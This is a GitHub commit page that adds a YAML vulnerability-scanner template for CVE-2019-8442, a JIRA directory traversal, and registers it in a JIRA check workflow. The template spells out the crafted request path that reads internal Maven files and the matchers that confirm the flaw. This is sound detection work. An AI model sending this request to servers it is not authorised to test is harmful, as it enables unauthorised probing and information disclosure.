Merge pull request #532 from sillydadddy/patch-2

Create CVE-2019-8442.yaml
patch-1
bauthard 2020-10-03 11:27:55 +05:30 committed by GitHub
commit b4b712f4e8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 21 additions and 0 deletions

19
cves/CVE-2019-8442.yaml Normal file
View File

@ -0,0 +1,19 @@
id: cve-2019-8442
info:
name: JIRA Directory Traversal
author: Kishore Krishna (siLLyDaddy)
severity: medium
requests:
- method: GET
path:
- >-
{{BaseURL}}/s/anything/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- <groupId>com.atlassian.jira</groupId>
part: body

View File

@ -18,6 +18,7 @@ variables:
jira_cve_5: cves/CVE-2019-3396.yaml
jira_cve_6: cves/CVE-2020-14179.yaml
jira_cve_7: cves/CVE-2020-14181.yaml
jira_cve_8: cves/CVE-2019-8442.yaml
logic:
|
@ -34,4 +35,5 @@ logic:
jira_cve_5()
jira_cve_6()
jira_cve_7()
jira_cve_8()
}